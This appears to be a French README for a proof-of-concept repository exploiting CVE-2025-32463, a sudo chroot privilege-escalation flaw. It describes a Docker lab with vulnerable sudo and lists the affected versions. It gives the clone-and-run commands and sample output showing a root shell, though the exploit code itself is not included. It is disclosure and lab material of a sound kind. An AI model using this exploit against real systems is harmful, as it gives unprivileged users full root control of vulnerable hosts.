
Exploit de preuve de concept pour CVE-2025-32463, une vulnérabilité d'élévation de privilèges dans la fonctionnalité chroot de sudo. Inclut un environnement Docker et un script d'exploit pour générer un shell root.
Ce dépôt fournit un environnement minimal et reproductible pour démontrer la faille d'escalade de privilèges CVE‑2025‑32463 dans la fonctionnalité chroot de sudo.
| Fichier | Objectif |
|---|---|
| Dockerfile | Construit une image Ubuntu 24.04 avec sudo 1.9.16p2 vulnérable et les outils de compilation |
| sudo‑chwoot.sh | Exploit de preuve de concept qui lance un shell root à l'intérieur du chroot |
| run.sh | Script utilitaire qui construit l'image (si nécessaire) et lance le conteneur d'exploit |
Les versions vulnérables de sudo 1.9.14 à 1.9.17 (toutes les révisions p) sur la plupart des distributions Linux sont affectées.
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
run.sh transmet --privileged et --rm à Docker afin que le conteneur se nettoie automatiquement à la sortie.
Supprimez l'image lorsque vous avez terminé :
docker rmi sudo-chwoot